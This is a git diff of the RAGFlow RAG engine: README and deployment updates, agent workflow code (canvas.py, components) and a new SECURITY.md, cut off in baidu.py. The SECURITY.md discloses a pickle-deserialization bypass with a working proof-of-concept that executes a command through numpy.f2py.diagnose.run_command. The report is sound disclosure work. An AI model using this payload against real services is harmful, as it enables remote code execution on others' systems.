$ docker build -t infiniflow/ragflow:v0.5.0 .
$ docker build -t infiniflow/ragflow:v0.8.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -251,7 +271,10 @@ $ bash ./entrypoint.sh
## 📚 Documentation
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 Roadmap
@ -261,7 +284,8 @@ $ bash ./entrypoint.sh
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
## 🙌 Contributing
RAGFlow has grown through open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to take part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
RAGFlow has grown through open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to take part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.


@ -17,16 +17,47 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
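## 💡 What is RAGFlow?
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine built on deep document understanding. RAGFlow offers a streamlined RAG workflow to businesses of any scale and to individuals, combining large language models (LLMs) to provide reliable question answering with well-founded citations from users' data in a variety of complex formats.
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine built on deep document understanding. RAGFlow offers a streamlined RAG workflow to businesses of any scale and to individuals, combining large language models (LLMs) to provide reliable question answering with well-founded citations from users' data in a variety of complex formats.
## 🎮 Demo
Try the demo at [https://demo.ragflow.io](https://demo.ragflow.io).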
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 Recent Updates
- 2024-08-02 Supports GraphRAG, inspired by [graphrag](https://github.com/microsoft/graphrag), and mind maps.
- 2024-07-23 Supports parsing audio files.
- 2024-07-21 Supports more LLM suppliers (LocalAI/OpenRouter/StepFun/Nvidia).
- 2024-07-18 Supports the Wikipedia, PubMed, Baidu, and Duckduckgo components in Graph.
- 2024-07-08 Supports Agentic RAG: [Graph](./graph/README.md)-based workflows.
- 2024-06-27 The Q&A parsing method supports Markdown and Docx files.
- 2024-06-27 Supports extracting images from Docx files.
- 2024-06-27 Supports extracting tables from Markdown files.
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in the dialog settings.
- 2024-05-30 Integrates the [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
- 2024-05-23 Implements [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
- 2024-05-15 Integrates the LLM OpenAI GPT-4o.
## 🌟 Key Features
@ -47,7 +78,7 @@
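### 🍔 **Compatibility with heterogeneous data sources**
- Supports a rich set of file types, including Word documents, PPT, Excel spreadsheets, txt files, images, PDF, scanned copies, photocopies, structured data, web pages, and more.
- Supports a rich set of file types, including Word documents, PPT, Excel spreadsheets, txt files, images, PDF, scanned copies, photocopies, structured data, web pages, and more.
### 🛀 **A worry-free, automated RAG workflow**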
@ -56,17 +87,6 @@
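- Multiple recall paired with fused re-ranking.
- Easy-to-use APIs that integrate readily with all kinds of enterprise systems.
## 📌 New Features
- 2024-05-08 Integrates the LLM DeepSeek.
- 2024-04-26 Adds the 'File Management' feature.
- 2024-04-19 Supports the conversation API ([more](./docs/conversation_api.md)).
- 2024-04-16 Integrates the embedding model [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local deployment of large models.
- 2024-04-10 Adds an underlying model for the 'Laws' layout analysis.
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local deployment of large models.
- 2024-04-07 Supports a Chinese UI.
## 🔎 System Architecture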
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -85,7 +105,7 @@
### 🚀 Start up the server
1. Ensure `vm.max_map_count` is no less than 262144 ([more](./docs/max_map_count.md)):
1. Ensure `vm.max_map_count` is no less than 262144:
> To check the value of `vm.max_map_count`:
>
@ -120,7 +140,7 @@
$ docker compose -f docker-compose-CN.yml up -d
```
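> Note that running the above commands automatically downloads the development version of the RAGFlow Docker image. To download and run a specific version of the Docker image, find the RAGFLOW_VERSION variable in the docker/.env file and change it to the corresponding version, for example RAGFLOW_VERSION=v0.5.0, then run the above commands.
> Note that running the above commands automatically downloads the development version of the RAGFlow Docker image. To download and run a specific version of the Docker image, find the RAGFLOW_VERSION variable in the docker/.env file and change it to the corresponding version, for example RAGFLOW_VERSION=v0.9.0, then run the above commands.
> The core image is about 9 GB and may take a while to pull. Please be patient.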
@ -151,7 +171,7 @@
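> In the example above, you only need to enter http://IP_OF_YOUR_MACHINE: with an unmodified configuration, the port (the default HTTP serving port 80) can be omitted.
6. In [service_conf.yaml](./docker/service_conf.yaml), set the LLM factory in `user_default_llm` and fill in the `API_KEY` field with the API key that corresponds to the model you selected.
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for details.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for details.
_The show is on; let the music and dancing continue!_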
@ -182,7 +202,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.5.0 .
$ docker build -t infiniflow/ragflow:v0.9.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -247,10 +267,34 @@ $ docker compose -f docker-compose-base.yml up -d
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
7. Launch the WebUI service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# Update proxy.target to http://127.0.0.1:9380
$ npm run dev
```
8. Deploy the WebUI service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ umi build
$ mkdir -p /ragflow/web
$ cp -r dist /ragflow/web
$ apt install nginx -y
$ cp ../docker/nginx/proxy.conf /etc/nginx
$ cp ../docker/nginx/nginx.conf /etc/nginx
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
$ systemctl start nginx
```
## 📚 Documentation
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 Roadmap
@ -260,10 +304,15 @@ $ bash ./entrypoint.sh
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
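## 🙌 Contributing
RAGFlow can only flourish through open-source collaboration. In this spirit, we welcome all kinds of contributions from the community. If you would like to take part, please review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md).
RAGFlow can only flourish through open-source collaboration. In this spirit, we welcome all kinds of contributions from the community. If you would like to take part, please review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md).
## 🤝 Business Cooperation
- [Book a consultation](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
## 👥 Join the Community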

74
SECURITY.md Normal file

@ -0,0 +1,74 @@
# Security Policy
## Supported Versions
Use this section to tell people about which versions of your project are
currently being supported with security updates.
| Version | Supported |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |
## Reporting a Vulnerability
### Branch name
main
### Actual behavior
The `restricted_loads` function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, which can lead to code execution.
The main reason is that the numpy module contains a `numpy.f2py.diagnose.run_command` function that directly executes commands, while `restricted_loads` allows users to import any function from the numpy module.
### Steps to reproduce
**ragflow_patch.py**
```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```
Then, **PoC.py**
```py
import pickle
from ragflow_patch import restricted_loads


class Exploit:
    def __reduce__(self):
        import numpy.f2py.diagnose
        return numpy.f2py.diagnose.run_command, ('whoami', )


Payload = pickle.dumps(Exploit())
restricted_loads(Payload)
```
**Result**
![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
### Additional information
#### How to prevent?
Strictly filter both the module and the name before resolving them with the `getattr` function.
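
One way to read this advice is to allowlist exact `(module, name)` pairs instead of whole top-level packages. The sketch below illustrates that idea only; it is not the fix RAGFlow shipped. `ALLOWED_GLOBALS`, `AllowlistUnpickler`, and `allowlist_loads` are hypothetical names, and the single allowlisted entry is a placeholder for whatever globals an application really needs.

```python
import io
import pickle

# Hypothetical allowlist: only these exact (module, name) pairs may be resolved.
# The entry below is a placeholder, not RAGFlow's real requirement.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Check the full module path AND the attribute name, not just the
        # top-level package, so numpy.f2py.diagnose.run_command is rejected.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def allowlist_loads(src):
    """Helper analogous to pickle.loads(), restricted to ALLOWED_GLOBALS."""
    return AllowlistUnpickler(io.BytesIO(src)).load()
```

With this shape, a payload whose `__reduce__` points at any callable outside the allowlist fails with `pickle.UnpicklingError` before the callable is ever looked up.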

45
agent/README.md Normal file

@ -0,0 +1,45 @@
English | [简体中文](./README_zh.md)
# *Graph*
## Introduction
*Graph* is a mathematical concept composed of nodes and edges.
Here, it is used to compose a complex workflow or agent.
Unlike a DAG, this graph may contain cycles, which we can use to describe loops in an agent or workflow.
Under this folder, we provide a test tool, ./test/client.py, which can test DSLs such as the JSON files in the folder ./test/dsl_examples.
Run this client from the same folder in which you start RAGFlow. If RAGFlow runs in Docker, enter the container before running the client.
Otherwise, the configurations in conf/service_conf.yaml must be correct.
```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m
options:
-h, --help show this help message and exit
-s DSL, --dsl DSL input dsl
-t TENANT_ID, --tenant_id TENANT_ID
Tenant ID
-m, --stream Stream output
```
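
The help text above implies three required options. As a rough sketch only, an `argparse` parser of the following shape would accept the same flags; it is an assumption based on the usage line, not the actual contents of `client.py`, and `build_parser` and the sample argument values are hypothetical.

```python
import argparse


def build_parser():
    # Hypothetical reconstruction from the usage text; the real client may differ.
    parser = argparse.ArgumentParser(prog="client.py")
    parser.add_argument("-s", "--dsl", required=True, help="input dsl")
    parser.add_argument("-t", "--tenant_id", required=True, help="Tenant ID")
    # The usage line shows -m without brackets, so it is treated as required here.
    parser.add_argument("-m", "--stream", action="store_true", required=True,
                        help="Stream output")
    return parser


# Placeholder values: a DSL file path and a tenant ID of your own.
args = build_parser().parse_args(["-s", "path/to/dsl.json", "-t", "TENANT_ID", "-m"])
print(args.dsl, args.tenant_id, args.stream)
```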
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
</div>
## How to obtain a TENANT_ID for the command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 We plan to display it here in the near future.
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>
## How to set 'kb_ids' for component 'Retrieval' in DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>

46
agent/README_zh.md Normal file
View File

@ -0,0 +1,46 @@
[English](./README.md) | 简体中文
# *Graph*
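## Introduction
*Graph* is a mathematical concept composed of nodes and edges.
It is used to build complex workflows or agents.
This graph goes beyond a directed acyclic graph (DAG): we can use cycles to describe our agents or workflows.
Under this folder, we provide a test tool, ./test/client.py,
which can test DSL files such as those in the folder ./test/dsl_examples.
Use this client from the same folder in which you start RAGFlow. If RAGFlow runs in Docker, enter the container before running the client.
Otherwise, it is essential that conf/service_conf.yaml is configured correctly.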
```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m
options:
-h, --help show this help message and exit
-s DSL, --dsl DSL input dsl
-t TENANT_ID, --tenant_id TENANT_ID
Tenant ID
-m, --stream Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
</div>
## How to obtain the TENANT_ID used on the command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 It will be displayed here later:
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>
## How to set 'kb_ids' for the 'Retrieval' component in the DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>

0
agent/__init__.py Normal file

302
agent/canvas.py Normal file

@ -0,0 +1,302 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import json
import traceback
from abc import ABC
from copy import deepcopy
from functools import partial

import pandas as pd

from agent.component import component_class
from agent.component.base import ComponentBase
from agent.settings import flow_logger, DEBUG


class Canvas(ABC):
    """
    dsl = {
        "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {},
                },
                "downstream": ["answer_0"],
                "upstream": [],
            },
            "answer_0": {
                "obj": {
                    "component_name": "Answer",
                    "params": {}
                },
                "downstream": ["retrieval_0"],
                "upstream": ["begin", "generate_0"],
            },
            "retrieval_0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {}
                },
                "downstream": ["generate_0"],
                "upstream": ["answer_0"],
            },
            "generate_0": {
                "obj": {
                    "component_name": "Generate",
                    "params": {}
                },
                "downstream": ["answer_0"],
                "upstream": ["retrieval_0"],
            }
        },
        "history": [],
        "messages": [],
        "reference": [],
        "path": [["begin"]],
        "answer": []
    }
    """

    def __init__(self, dsl: str, tenant_id=None):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.components = {}
        self.dsl = json.loads(dsl) if dsl else {
            "components": {
                "begin": {
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "prologue": "Hi there!"
                        }
                    },
                    "downstream": [],
                    "upstream": []
                }
            },
            "history": [],
            "messages": [],
            "reference": [],
            "path": [],
            "answer": []
        }
        self._tenant_id = tenant_id
        self._embed_id = ""
        self.load()

    def load(self):
        self.components = self.dsl["components"]
        cpn_nms = set([])
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])

        assert "Begin" in cpn_nms, "There has to be a 'Begin' component."
        assert "Answer" in cpn_nms, "There has to be an 'Answer' component."

        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])
            param = component_class(cpn["obj"]["component_name"] + "Param")()
            param.update(cpn["obj"]["params"])
            param.check()
            cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
            if cpn["obj"].component_name == "Categorize":
                for _, desc in param.category_description.items():
                    if desc["to"] not in cpn["downstream"]:
                        cpn["downstream"].append(desc["to"])

        self.path = self.dsl["path"]
        self.history = self.dsl["history"]
        self.messages = self.dsl["messages"]
        self.answer = self.dsl["answer"]
        self.reference = self.dsl["reference"]
        self._embed_id = self.dsl.get("embed_id", "")

    def __str__(self):
        self.dsl["path"] = self.path
        self.dsl["history"] = self.history
        self.dsl["messages"] = self.messages
        self.dsl["answer"] = self.answer
        self.dsl["reference"] = self.reference
        self.dsl["embed_id"] = self._embed_id
        dsl = {
            "components": {}
        }
        for k in self.dsl.keys():
            if k in ["components"]:continue
            dsl[k] = deepcopy(self.dsl[k])

        for k, cpn in self.components.items():
            if k not in dsl["components"]:
                dsl["components"][k] = {}
            for c in cpn.keys():
                if c == "obj":
                    dsl["components"][k][c] = json.loads(str(cpn["obj"]))
                    continue
                dsl["components"][k][c] = deepcopy(cpn[c])
        return json.dumps(dsl, ensure_ascii=False)

    def reset(self):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.reference = []
        for k, cpn in self.components.items():
            self.components[k]["obj"].reset()
        self._embed_id = ""

    def run(self, **kwargs):
        ans = ""
        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            try:
                ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            except Exception as e:
                ans = ComponentBase.be_output(str(e))
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans
            self.history.append(("assistant", ans.to_dict("records")))
            return ans

        if not self.path:
            self.components["begin"]["obj"].run(self.history, **kwargs)
            self.path.append(["begin"])

        self.path.append([])
        ran = -1

        def prepare2run(cpns):
            nonlocal ran, ans
            for c in cpns:
                if self.path[-1] and c == self.path[-1][-1]: continue
                cpn = self.components[c]["obj"]
                if cpn.component_name == "Answer":
                    self.answer.append(c)
                else:
                    if DEBUG: print("RUN: ", c)
                    if cpn.component_name == "Generate":
                        cpids = cpn.get_dependent_components()
                        if any([c not in self.path[-1] for c in cpids]):
                            continue
                    ans = cpn.run(self.history, **kwargs)
                    self.path[-1].append(c)
            ran += 1

        prepare2run(self.components[self.path[-2][-1]]["downstream"])
        while 0 <= ran < len(self.path[-1]):
            if DEBUG: print(ran, self.path)
            cpn_id = self.path[-1][ran]
            cpn = self.get_component(cpn_id)
            if not cpn["downstream"]: break

            loop = self._find_loop()
            if loop: raise OverflowError(f"Too many loops: {loop}")

            if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
                switch_out = cpn["obj"].output()[1].iloc[0, 0]
                assert switch_out in self.components, \
                    "{}'s output: {} not valid.".format(cpn_id, switch_out)
                try:
                    prepare2run([switch_out])
                except Exception as e:
                    for p in [c for p in self.path for c in p][::-1]:
                        if p.lower().find("answer") >= 0:
                            self.get_component(p)["obj"].set_exception(e)
                            prepare2run([p])
                            break
                    traceback.print_exc()
                    break
                continue

            try:
                prepare2run(cpn["downstream"])
            except Exception as e:
                for p in [c for p in self.path for c in p][::-1]:
                    if p.lower().find("answer") >= 0:
                        self.get_component(p)["obj"].set_exception(e)
                        prepare2run([p])
                        break
                traceback.print_exc()
                break

        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans

            self.history.append(("assistant", ans.to_dict("records")))

        return ans

    def get_component(self, cpn_id):
        return self.components[cpn_id]

    def get_tenant_id(self):
        return self._tenant_id

    def get_history(self, window_size):
        convs = []
        for role, obj in self.history[window_size * -2:]:
            convs.append({"role": role, "content": (obj if role == "user" else
                                                    '\n'.join(pd.DataFrame(obj)['content']))})
        return convs

    def add_user_input(self, question):
        self.history.append(("user", question))

    def set_embedding_model(self, embed_id):
        self._embed_id = embed_id

    def get_embedding_model(self):
        return self._embed_id

    def _find_loop(self, max_loops=2):
        path = self.path[-1][::-1]
        if len(path) < 2: return False

        for i in range(len(path)):
            if path[i].lower().find("answer") >= 0:
                path = path[:i]
                break

        if len(path) < 2: return False

        for l in range(2, len(path) // 2):
            pat = ",".join(path[0:l])
            path_str = ",".join(path)
            if len(pat) >= len(path_str): return False
            loop = max_loops
            while path_str.find(pat) == 0 and loop >= 0:
                loop -= 1
                if len(pat)+1 >= len(path_str):
                    return False
                path_str = path_str[len(pat)+1:]
            if loop < 0:
                pat = " => ".join([p.split(":")[0] for p in path[0:l]])
                return pat + " => " + pat

        return False
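
The DSL in the `Canvas` docstring records every edge twice: once in the source component's `downstream` list and once in the target's `upstream` list. The sketch below shows one way to check that the two views agree before loading a DSL. `check_dsl_edges` is a hypothetical helper, not part of RAGFlow, and it assumes a purely static DSL (`Canvas.load` may append extra `downstream` entries for `Categorize` components, which this check does not model).

```python
def check_dsl_edges(dsl):
    """Return a list of human-readable problems; an empty list means consistent."""
    problems = []
    components = dsl["components"]
    for cid, cpn in components.items():
        # Every downstream target must exist and list this component as upstream.
        for down in cpn["downstream"]:
            if down not in components:
                problems.append(f"{cid}: unknown downstream '{down}'")
            elif cid not in components[down]["upstream"]:
                problems.append(f"{cid} -> {down}: '{cid}' missing from upstream of '{down}'")
        # Every upstream source must exist and list this component as downstream.
        for up in cpn["upstream"]:
            if up not in components:
                problems.append(f"{cid}: unknown upstream '{up}'")
            elif cid not in components[up]["downstream"]:
                problems.append(f"{up} -> {cid}: '{cid}' missing from downstream of '{up}'")
    return problems


# The four-component example from the docstring, reduced to its edges.
example = {
    "components": {
        "begin": {"downstream": ["answer_0"], "upstream": []},
        "answer_0": {"downstream": ["retrieval_0"], "upstream": ["begin", "generate_0"]},
        "retrieval_0": {"downstream": ["generate_0"], "upstream": ["answer_0"]},
        "generate_0": {"downstream": ["answer_0"], "upstream": ["retrieval_0"]},
    }
}
print(check_dsl_edges(example))
```

The `generate_0` to `answer_0` edge closes a cycle, which is legal here because the graph is not restricted to a DAG.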


@ -0,0 +1,25 @@
import importlib
from .begin import Begin, BeginParam
from .generate import Generate, GenerateParam
from .retrieval import Retrieval, RetrievalParam
from .answer import Answer, AnswerParam
from .categorize import Categorize, CategorizeParam
from .switch import Switch, SwitchParam
from .relevant import Relevant, RelevantParam
from .message import Message, MessageParam
from .rewrite import RewriteQuestion, RewriteQuestionParam
from .keyword import KeywordExtract, KeywordExtractParam
from .baidu import Baidu, BaiduParam
from .duckduckgo import DuckDuckGo, DuckDuckGoParam
from .wikipedia import Wikipedia, WikipediaParam
from .pubmed import PubMed, PubMedParam
from .arxiv import ArXiv, ArXivParam
from .google import Google, GoogleParam
from .bing import Bing, BingParam
from .googlescholar import GoogleScholar, GoogleScholarParam
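def component_class(class_name):
    # Resolve a component (or its *Param class) by name from this package.
    # The other modules in this change import the package as `agent.component`.
    m = importlib.import_module("agent.component")
    c = getattr(m, class_name)
    return c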

79
agent/component/answer.py Normal file

@ -0,0 +1,79 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase


class AnswerParam(ComponentParamBase):
    """
    Define the Answer component parameters.
    """

    def __init__(self):
        super().__init__()
        self.post_answers = []

    def check(self):
        return True


class Answer(ComponentBase, ABC):
    component_name = "Answer"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)

        ans = self.get_input()
        if self._param.post_answers:
            ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
        return ans

    def stream_output(self):
        res = None
        if hasattr(self, "exception") and self.exception:
            res = {"content": str(self.exception)}
            self.exception = None
            yield res
            self.set_output(res)
            return

        stream = self.get_stream_input()
        if isinstance(stream, pd.DataFrame):
            res = stream
            answer = ""
            for ii, row in stream.iterrows():
                answer += row.to_dict()["content"]
            yield {"content": answer}
        else:
            for st in stream():
                res = st
                yield st
        if self._param.post_answers:
            res["content"] += random.choice(self._param.post_answers)
            yield res

        self.set_output(res)

    def set_exception(self, e):
        self.exception = e
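
In streaming mode `Answer._run` does not produce the answer itself; it returns a `functools.partial` wrapping a generator, and the caller starts the stream by calling it. The sketch below illustrates that pattern with a hypothetical `EchoComponent` class and plain dicts instead of DataFrames; it is not the component's actual data flow.

```python
from functools import partial


class EchoComponent:
    """Hypothetical stand-in for a component with a streaming mode."""

    def __init__(self, chunks):
        self.chunks = chunks
        self.output = None

    def run(self, stream=False):
        if stream:
            # Defer the work: the caller decides when to start iterating.
            return partial(self.stream_output)
        return {"content": "".join(self.chunks)}

    def stream_output(self):
        answer = ""
        for chunk in self.chunks:
            answer += chunk
            # Each yielded item carries the text accumulated so far.
            yield {"content": answer}
        # Record the final value once the stream is exhausted.
        self.output = {"content": answer}


cpn = EchoComponent(["Hel", "lo"])
result = cpn.run(stream=True)
pieces = [p["content"] for p in result()]
```

Because the final output is only recorded after the generator finishes, a consumer that stops iterating early leaves `output` unset.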

69
agent/component/arxiv.py Normal file

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import arxiv
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class ArXivParam(ComponentParamBase):
    """
    Define the ArXiv component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 6
        self.sort_by = 'submittedDate'

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
                               ['submittedDate', 'lastUpdatedDate', 'relevance'])


class ArXiv(ComponentBase, ABC):
    component_name = "ArXiv"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return ArXiv.be_output("")

        try:
            sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
                            "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
                            'submittedDate': arxiv.SortCriterion.SubmittedDate}
            arxiv_client = arxiv.Client()
            search = arxiv.Search(
                query=ans,
                max_results=self._param.top_n,
                sort_by=sort_choices[self._param.sort_by]
            )
            arxiv_res = [
                {"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary} for
                i in list(arxiv_client.results(search))]
        except Exception as e:
            return ArXiv.be_output("**ERROR**: " + str(e))

        if not arxiv_res:
            return ArXiv.be_output("")

        df = pd.DataFrame(arxiv_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df

69
agent/component/baidu.py Normal file

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
